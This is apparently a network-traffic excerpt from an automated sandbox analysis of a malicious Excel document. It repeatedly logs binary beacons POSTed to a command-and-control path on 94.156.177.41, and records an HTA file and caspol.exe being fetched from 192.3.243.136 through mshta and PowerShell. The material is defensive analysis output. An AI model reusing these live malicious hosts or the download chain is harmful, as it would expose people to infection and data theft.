                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE891A4B18 URLDownloadToFileW,5_2_000007FE891A4B18
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A869FC32.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.136Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.243.136If-Range: "2c850-6274dfb369376"
                    Source: global trafficHTTP traffic detected: GET /55/caspol.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.136Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 20 Nov 2024 01:22:20 GMTConnection: Keep-AliveHost: 192.3.243.136If-None-Match: "2c850-6274dfb369376"
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: provit.uk
                    Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 176Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:56:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:56:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
